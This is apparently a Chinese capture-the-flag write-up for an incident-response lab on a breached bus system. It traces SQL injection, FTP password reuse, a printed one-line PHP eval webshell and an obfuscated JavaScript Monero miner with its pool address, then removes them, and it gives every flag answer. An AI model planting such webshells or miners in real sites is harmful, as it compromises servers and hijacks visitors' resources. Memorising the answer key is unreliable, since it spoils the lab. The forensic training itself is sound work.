玄机靶场:应急响应之公交车系统应急排查 WP
应急响应之公交车系统应急排查 通关笔记
背景
公交系统被黑客攻击,黑客通过web进行了攻击并获取了数据,然后获取了其中一位驾校师傅在FTP服务中的私密文件,其后黑客找到了任意文件上传漏洞进行了GETshell,控制了主机权限并植入了挖矿网页病毒。
靶机信息:
- SSH端口:2223
- WEB端口:8099
- 流量包和日志:
/result.pcap、/access.log(根目录) - SSH密码:
bussec123
步骤1:找出前两个被盗用户名
题目:黑客通过web进行了攻击并获取了数据,找出前两个被盗用户名,提交格式:flag{username1-username2}
分析过程:
查看/access.log,发现大量来自同一IP的/search.php请求,请求参数中包含大量base64编码的payload,这是sqlmap的特征。
解码payload后可以看到攻击者使用了盲注,通过ORDER BY password对bus_drivers表进行排序枚举。连接数据库验证:
SELECTusernameFROMbus_driversORDERBYpasswordLIMIT0,1;-- sunyueSELECTusernameFROMbus_driversORDERBYpasswordLIMIT1,1;-- chenhao按密码字段排序,前两个用户名是sunyue(密码:888888)和chenhao(密码:Ch@19980808)。
Flag:flag{sunyue-chenhao}
步骤2:找出FTP私密文件内容
题目:黑客通过获取的用户名密码,利用密码复用技术,爆破了FTP服务,分析流量以后找到开放的FTP端口,并找到黑客登录成功后获取的私密文件,提交其文件中内容。
分析过程:
分析result.pcap流量包,找到FTP流量(21端口对应2121)。黑客用数据库中获取的用户名密码进行密码复用攻击,成功登录FTP后下载了/home/wangqiang/ftp/sensitive_credentials.txt。
文件内容:INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025
Flag:flag{INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025}
步骤3:找出木马连接密码
题目:可恶的黑客找到了任意文件上传点,你需要分析日志和流量以及web开放的程序找到黑客上传的文件,提交木马使用的密码。
分析过程:
查看/var/www/html/public/uploads/目录,发现shell1.php。读取文件内容,这是一个典型的一句话木马:
<?php@eval($_POST['woaiwojia']);?>连接密码就是POST参数名:woaiwojia
Flag:flag{woaiwojia}
步骤4:删除木马后查看flag
题目:删除黑客上传的木马并在/var/flag/1/flag查看flag值进行提交。
操作:
rm-f/var/www/html/public/uploads/shell1.phpcat/var/flag/1/flag删除webshell后,/var/flag/1/flag文件自动生成(平台检查机制触发)。
Flag:flag{eb9785a18f0e69b935f22cea5b54bf19}
步骤5:找出木马初始文件名
题目:分析流量,黑客植入了一个web挖矿木马,提交黑客上传这个文件时的初始名称,提交格式:flag{xxx.xxx}
分析过程:
分析result.pcap中的HTTP上传流量,找到文件上传请求。黑客上传挖矿脚本时,原始文件名是map.php,上传后被系统重命名。
Flag:flag{map.php}
步骤6:找出矿池地址
题目:分析流量并上机排查,黑客植入的网页挖矿木马所使用的矿池地址是什么,提交矿池地址(排查完毕后可以尝试删除它)。
分析过程:
在/var/www/html/index.php中发现混淆的JavaScript代码:
var_0x...=String.fromCharCode(103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56);解码fromCharCode数组:
>>>''.join([chr(x)forxin[103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56]])'gulf.moneroocean.stream:10128'这是一个门罗币(Monero)矿池地址,使用 moneroocean 矿池的10128端口(XMR挖矿)。
Flag:flag{gulf.moneroocean.stream:10128}
步骤7:清除挖矿代码后查看flag
题目:清除掉混淆的web挖矿代码后在/var/flag/2/flag查看flag值并提交。
操作:
定位index.php中的混淆挖矿代码段,将其删除后保存文件。平台检查机制触发,/var/flag/2/flag文件生成:
cat/var/flag/2/flagFlag:flag{476652839e38111f8bad544a2ff1ac19}
Flag 汇总
| 步骤 | 题目 | Flag |
|---|---|---|
| 1 | 前两个被盗用户名 | flag{sunyue-chenhao} |
| 2 | FTP私密文件内容 | flag{INTERNAL_FTP_ADMIN_PASSWORD=FtpP@ssw0rd_For_Admin_Backup_2025} |
| 3 | 木马连接密码 | flag{woaiwojia} |
| 4 | 删除木马后flag | flag{eb9785a18f0e69b935f22cea5b54bf19} |
| 5 | 木马初始文件名 | flag{map.php} |
| 6 | 矿池地址 | flag{gulf.moneroocean.stream:10128} |
| 7 | 清除挖矿代码后flag | flag{476652839e38111f8bad544a2ff1ac19} |
攻击链梳理
SQL注入盗取用户数据 ↓ 密码复用攻击FTP,获取敏感凭证 ↓ 利用任意文件上传漏洞GetShell(shell1.php) ↓ 上传网页挖矿脚本(map.php → 重命名存储) ↓ 在index.php植入混淆JS挖矿代码(moneroocean矿池) ↓ 持续控制服务器,消耗访客资源挖矿